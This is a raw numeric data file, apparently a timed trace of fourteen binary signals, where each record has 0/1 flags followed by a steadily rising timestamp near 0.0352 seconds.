1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221220e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221228e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221272e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221296e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221320e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221348e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221396e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221420e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221428e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5221444e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221468e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5221496e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221520e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5221548e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221572e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.5221576e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221580e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221620e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221644e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221652e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5221696e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221720e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221728e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221748e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221772e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221796e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221820e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221844e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221868e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221924e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,3.5221948e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221952e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5221996e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222020e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222028e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222096e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222120e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222148e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222172e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222196e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222200e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5222220e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222244e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222252e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222296e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222320e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222324e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5222348e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222372e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5222396e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222420e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5222444e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222476e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222524e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222548e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222572e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222596e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222600e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5222644e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222676e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222720e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,3.5222748e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222752e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5222772e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222796e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5222820e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222844e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5222868e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5222896e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222900e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222948e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5222972e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5222996e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223020e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223096e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223100e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5223120e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223148e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223152e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223172e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223196e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223220e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223244e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223252e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5223296e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223320e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223328e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223348e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223372e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223396e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223420e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,3.5223424e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223428e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5223444e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223476e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223524e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,3.5223548e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223552e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5223572e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223596e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5223620e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223644e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5223668e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5223696e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223700e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223748e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223768e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223796e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223820e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223844e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223868e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223892e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223916e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223940e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5223968e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5223992e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224020e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224044e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224068e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224092e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224116e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224140e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224168e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224192e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224220e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224244e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224268e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224292e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224316e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224340e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224368e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224392e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224420e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224444e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224468e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224492e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224516e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224540e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224568e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224592e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224620e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224644e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224668e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224692e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224716e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224744e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224768e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224792e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224820e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224844e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224868e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224892e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224916e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224940e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5224968e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5224992e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225020e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225044e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225068e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225092e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225116e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225144e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225168e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225192e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225220e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225244e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225268e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225292e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225316e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225340e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225368e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225392e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225420e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225444e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225468e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225492e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225516e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225540e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225568e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225592e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225620e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225644e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225668e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225692e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225716e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225740e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225768e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225792e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225820e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225844e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225868e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225892e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225916e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225948e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5225968e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5225992e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226020e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226044e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226068e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226092e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226116e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226140e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226168e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226192e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226220e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226244e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226268e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226292e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226316e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226340e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226368e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226392e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226420e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226444e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226468e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226492e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226516e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226540e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226568e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226592e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226620e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226644e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226668e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226692e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226716e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226740e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226768e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226792e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226820e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226844e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226868e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226892e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226916e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226940e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5226968e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5226992e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5227020e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5227044e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5227068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5351500e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.5351700e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5351720e-02 0,0,1,1,1,0,0,0,0,0,0,1,0,1,3.5351748e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5351780e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,3.5352060e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5352084e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,3.5352092e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,1,3.5352140e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,3.5352164e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5352172e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,3.5352188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5352212e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,3.5352260e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5352284e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,3.5352308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5352332e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352340e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5352388e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352412e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352420e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5352436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352460e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352468e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5352512e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352540e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352544e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5352564e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352588e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5352612e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352636e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5352660e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352684e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5352708e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352740e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5352788e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352812e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352820e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5352836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352860e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352868e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5352912e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352936e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5352964e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5352988e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,3.5352992e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5352996e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353036e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353060e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353084e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353108e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353136e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353140e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5353188e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353220e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353260e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353268e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5353312e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353336e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,3.5353340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353344e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353360e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353388e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353412e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353436e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353460e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353484e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353492e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5353508e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353536e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5353588e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353612e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353620e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353708e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353740e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353760e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353768e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5353784e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353808e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5353836e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353860e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5353884e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5353908e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353916e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5353956e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5353984e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354008e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354036e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354060e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354084e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354088e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5354132e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354156e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354308e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,3.5354312e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354316e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5354332e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354356e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354408e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354412e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5354460e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354484e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5354508e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354540e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354556e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354584e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354608e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354636e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354660e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354684e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354688e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5354736e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354756e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354768e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354784e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354808e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354812e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5354860e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5354884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354892e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354908e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354932e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5354956e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5354984e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355008e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5355036e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5355084e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5355108e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355116e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355156e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355236e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,3.5355260e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5355264e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5355308e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5355332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355340e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355356e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355384e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355408e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355436e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355460e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355484e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5355488e-02 